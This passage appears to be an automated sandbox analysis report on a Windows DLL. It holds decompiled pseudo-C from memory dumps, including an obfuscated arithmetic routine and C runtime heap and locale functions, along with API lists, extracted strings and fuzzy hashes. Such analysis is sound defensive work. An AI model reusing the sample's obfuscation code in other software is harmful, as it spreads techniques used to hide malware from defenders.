				_t174 = E6DDD4197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6DDD1E10(_t174);
				_t176 =  *0x6de959dc; // 0x0
				 *(_t400 - 0x18) =  *0x6de959d8 * 0x36 +  *0x6de95a90;
				_t286 =  *0x6de95a90 * 0x10e1d;
				_t178 =  *0x6de959d8; // 0x69aaf581
				_t287 = 0x6de95a28;
				 *0x6de959d8 = _t178 * _t286;
				_t340 =  *0x6de95a90; // 0x17f0f31b
				_t180 =  *0x6de959d0; // 0x96574ad2
				 *0x6de959dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6de95a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6de959dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6de959d8 = _t184;
						_t427 = _t184 -  *0x6de95a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6de95a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
						_t426 =  *0x6de95a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6DDD0D32();
				_t364 =  *0x6de95a90; // 0x17f0f31b
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6de959dc; // 0x0
				_t188 =  *0x6de959d8; // 0x69aaf581
				_t190 =  *0x6de959f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6de959e6; // 0xf945
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6de959e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6de959e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6DDF01E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6de95a90 = _t364;
						if(_t364 != ( *0x6de959f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6de95a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6de95a98 - _t197; // 0x6de3e664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6de95a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6de959e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6de95a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6de95a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6de959d8 = _t297;
				 *0x6de959dc = _t346;
				do {
					if(_t393 != ( *0x6de959e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // -73177
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6de95a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // -73123
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6de959d8 = _t297;
						 *0x6de959dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6de959e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6de959e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6de959e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6de95a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6de959f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6de959e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6de95a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6de959d0 = _t105 + _t347;
				_t213 = E6DDD1029(_t394);
				_t300 =  *0x6de95a90; // 0x17f0f31b
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6de95a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6de959f2 =  *0x6de959f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6de959d0 = _t371;
				_t446 =  *0x6de95a04 - 0x1b47; // 0xac
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6de959e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6de959d8 = _t349;
					 *0x6de959dc =  *(_t400 - 0x14);
					_t371 =  *0x6de959d0; // 0x96574ad2
				}
				_t395 = 0x6de95a0e;
				do {
					if(_t300 != ( *0x6de959e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6de959e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6de959d0 = _t371;
				_t450 =  *0x6de95a02 - _t301; // 0x0
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6de959d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6de95a90 = _t117 + _t349 * 2;
				E6DDCFB4A(_t396, _t451);
				_t350 =  *0x6de95a00; // 0x0
				_t303 = 0x6de95ac8;
				_t372 =  *0x6de959d8; // 0x69aaf581
				do {
					_t452 = _t396 -  *0x6de95a18; // 0x4c
					if(_t452 != 0) {
						L80:
						_t120 = _t396 + 5; // 0x5
						 *0x6de959dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6de959d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6de95a00 = _t350;
					} else {
						_t453 = 0 -  *0x6de95a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6de95a18);
				_t222 =  *0x6de959dc; // 0x0
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6de95a58 =  *0x6de95a58 - _t396;
					asm("sbb [0x6de95a5c], eax");
					 *0x6de95a00 = _t354;
					asm("sbb ecx, [0x6de959dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6de959d8 = _t372;
					asm("adc ecx, eax");
					 *0x6de959dc = 0;
				}
				_t305 =  *0x6de95a90; // 0x17f0f31b
				_t306 =  *0x6de959d0; // 0x96574ad2
				 *0x6de959d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6DDF0075(1);
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDD128C
GetSystemDirectoryA.KERNEL32 ref: 6DDD13C5
GetTempPathA.KERNEL32(0000056D,6DEAC218,?,6DDEFF71,?,00000001,?,?,00000001,?,6DE927E0,0000000C,6DDF006E,?,00000001,?), ref: 6DDD1468

Strings

cd Matter m, xrefs: 6DDD1607
DZm, xrefs: 6DDD1967
Ym, xrefs: 6DDD13E1
DZm, xrefs: 6DDD144C
Ym, xrefs: 6DDD1915
DZm, xrefs: 6DDD184B
Ym, xrefs: 6DDD191F
Ym, xrefs: 6DDD1320
Molecul, xrefs: 6DDD167E
Ym, xrefs: 6DDD1A11
6623, xrefs: 6DDD16B1
cd Island, xrefs: 6DDD1531
Had s, xrefs: 6DDD14DF
6265, xrefs: 6DDD14CB
DZm, xrefs: 6DDD136C
(Zm, xrefs: 6DDD170E
Ym, xrefs: 6DDD1801
Ym, xrefs: 6DDD15FF
out drop , xrefs: 6DDD16C8
part , xrefs: 6DDD15B5

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: DirectoryH_prolog3PathSystemTemp
String ID: (Zm$6265$6623$DZm$DZm$DZm$DZm$Had s$Molecul$cd Island$cd Matter m$out drop $part $Ym$Ym$Ym$Ym$Ym$Ym$Ym
API String ID: 3607090873-2707971897
Opcode ID: 177128adc35e270f6ae16778a32b03086e4cecb3ac43cd793618469da202e0e8
Instruction ID: 94e23ca78b422213e21c6e45ee0ab784bc41335f6660cb7dcd6b8837380bd96d
Opcode Fuzzy Hash: 177128adc35e270f6ae16778a32b03086e4cecb3ac43cd793618469da202e0e8
Instruction Fuzzy Hash: DA3278B1A02612CFDF08DF78C89167977F1FB8A322B25812BE429DF681E7749841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD78D3, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6DDD78D3(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				intOrPtr* _t19;
				intOrPtr _t21;
				void* _t22;

				E6DDF00AC(0x6de38421, __ebx, __edi, __esi, 0);
				_t19 = __ecx;
				_push(8);
				 *__ecx = 0x6de3aa30;
				_t21 = E6DDEF8B6(__edx, __esi, __eflags);
				if(_t21 == 0) {
					_t21 = 0;
					__eflags = 0;
				} else {
					 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
					_push(1); // executed
					_t11 = E6DDD7005(__ebx, _t19, _t21); // executed
					 *((intOrPtr*)(_t21 + 4)) = _t11;
				}
				 *((intOrPtr*)(_t19 + 0x34)) = _t21;
				E6DDD7F47(_t19);
				return E6DDF0075(_t19);
			}

0x6ddd78da
0x6ddd78df
0x6ddd78e1
0x6ddd78e3
0x6ddd78ee
0x6ddd78f3
0x6ddd7906
0x6ddd7906
0x6ddd78f5
0x6ddd78f5
0x6ddd78f9
0x6ddd78fb
0x6ddd7901
0x6ddd7901
0x6ddd790a
0x6ddd790d
0x6ddd7919

APIs

__EH_prolog3.LIBCMT ref: 6DDD78DA
std::locale::_Init.LIBCPMT ref: 6DDD78FB

Part of subcall function 6DDD7005: __EH_prolog3.LIBCMT ref: 6DDD700C
Part of subcall function 6DDD7005: std::_Lockit::_Lockit.LIBCPMT ref: 6DDD7017
Part of subcall function 6DDD7005: std::locale::_Setgloballocale.LIBCPMT ref: 6DDD7032
Part of subcall function 6DDD7005: _Yarn.LIBCPMT ref: 6DDD7048
Part of subcall function 6DDD7005: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD7088

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: b7d03d525c597b3e5ecc54c98406f90307474a4973f54c9b3c194a7d31623aad
Instruction ID: 36f47d71b82abcd8cfb59cdb94b454e6dda5e54998b2f08da7bc3d820523ffb6
Opcode Fuzzy Hash: b7d03d525c597b3e5ecc54c98406f90307474a4973f54c9b3c194a7d31623aad
Instruction Fuzzy Hash: 54E0D837EE962177DB517B644502B3CA2506B40718F630089F2419F6C0CFB0880143E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1C7EF, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6DE1C7EF(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				void* _t16;
				signed int _t17;
				void* _t19;
				signed int _t20;
				long _t21;

				_t16 = __ecx;
				_t20 = _a4;
				if(_t20 == 0) {
					L2:
					_t21 = _t20 * _a8;
					if(_t21 == 0) {
						_t21 = _t21 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6de97b04, 8, _t21); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6DE2BEB2();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6DE12281())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6DE19256(_t15, _t16, _t17, _t19, __eflags, _t21);
						_pop(_t16);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t17 = _t13 % _t20;
				if(_t13 / _t20 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6de1c7ef
0x6de1c7f5
0x6de1c7fa
0x6de1c808
0x6de1c808
0x6de1c80e
0x6de1c810
0x6de1c810
0x6de1c827
0x6de1c830
0x6de1c838
0x00000000
0x00000000
0x6de1c818
0x6de1c81a
0x6de1c83c
0x6de1c841
0x6de1c847
0x00000000
0x6de1c847
0x6de1c81d
0x6de1c822
0x6de1c823
0x6de1c825
0x00000000
0x00000000
0x6de1c825
0x00000000
0x6de1c827
0x6de1c800
0x6de1c801
0x6de1c806
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6DE1D6B4,00000001,00000364,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9), ref: 6DE1C830

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 85cf4c2f1c3167279010d3f6a167e067e903cccc88aadbd5db54d35f3767415a
Instruction ID: 451769c59506111aa62c049e4505088cb35ea3a6f85c46900b635f04e3b39aa8
Opcode Fuzzy Hash: 85cf4c2f1c3167279010d3f6a167e067e903cccc88aadbd5db54d35f3767415a
Instruction Fuzzy Hash: 10F0E03174D12656EB211A579C45B6BB798AF52774B3591359C14F6280CF30F841C2E0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1F26D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6DE1F26D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				long _t11;

				_t8 = __ecx;
				_t11 = _a4;
				if(_t11 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6DE12281())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t11 == 0) {
					_t11 = _t11 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6de97b04, 0, _t11); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6DE2BEB2();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6DE19256(_t7, _t8, _t9, _t10, __eflags, _t11);
					_pop(_t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6de1f26d
0x6de1f273
0x6de1f279
0x6de1f2ab
0x6de1f2b0
0x6de1f2b6
0x00000000
0x6de1f2b6
0x6de1f27d
0x6de1f27f
0x6de1f27f
0x6de1f296
0x6de1f29f
0x6de1f2a7
0x00000000
0x00000000
0x6de1f287
0x6de1f289
0x00000000
0x00000000
0x6de1f28c
0x6de1f291
0x6de1f292
0x6de1f294
0x00000000
0x00000000
0x6de1f294
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,6DDD75D9,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004,00000000,00000000,00000000), ref: 6DE1F29F

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: af7a86895720ab0afd0f42de08a061351e3d68322c200ad388ff30fa02218c54
Instruction ID: 7047d5717f3d16d466f9e2d8ff96f9cb36f2e7fef4ebe4e00f95e189fb6ada04
Opcode Fuzzy Hash: af7a86895720ab0afd0f42de08a061351e3d68322c200ad388ff30fa02218c54
Instruction Fuzzy Hash: 90E0E57B74C1225AEB3116A59C00BAA3B98BF833B8F3605159D15A62C0DF68C840C1E0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6DE2E6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6DE2E6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6de9506c; // 0xc4837075
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6de1e03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6DE1D5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6DE1D5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6de1e03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6de42f04; // 0x17
					E6DE2E68F(0, " )�mU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6de1e03b
					E6DE2E00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6de1e03b
						E6DE2E112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6de1e03b
						E6DE2E077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6de42dec; // 0x41
						_t77 = E6DE2E68F(_t99, "t!�mE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6DE2E518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6DE245D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6DDEF8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6DE245D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6DE35124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6DE2E112(_t92, _t99,  &_v20);
						} else {
							E6DE2E077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,96574AD2), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,96574AD2), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D65E
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,96574AD2), ref: 6DE1D66B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6DE2E7F8
IsValidCodePage.KERNEL32(00000000), ref: 6DE2E853
IsValidLocale.KERNEL32(?,00000001), ref: 6DE2E862
GetLocaleInfoW.KERNEL32(?,00001001,;m,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6DE2E8AA
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6DE2E8C9

Strings

)mU, xrefs: 6DE2E751
t!mE, xrefs: 6DE2E7A5
;m, xrefs: 6DE2E702, 6DE2E8A1
;m, xrefs: 6DE2E715, 6DE2E725, 6DE2E7E5, 6DE2E787, 6DE2E77C, 6DE2E77F, 6DE2E78A, 6DE2E7E8
;m, xrefs: 6DE2E821, 6DE2E7C3, 6DE2E7CE

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: )mU$;m$;m$;m$t!mE
API String ID: 745075371-469580627
Opcode ID: 58661702ba643eda020379749338115409e1dfcd7831f36db701fc7a144c78de
Instruction ID: 26e71a0ce192d37410f522384ce4e92545f2799d156fb9948d837542c5888052
Opcode Fuzzy Hash: 58661702ba643eda020379749338115409e1dfcd7831f36db701fc7a144c78de
Instruction Fuzzy Hash: 54517572900A2AABEF14DFB5CC44ABE77B8FF45B04F254029E664EB240DF709945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2DD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6DE2DD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6DE1D5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6DE2DD27(" )�mU", 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6DE2D652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6DE2D775();
					} else {
						E6DE2D6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6DE2DD27("t!�mE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6DE2D775();
							} else {
								E6DE2D6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6DE2DBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6de1e042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
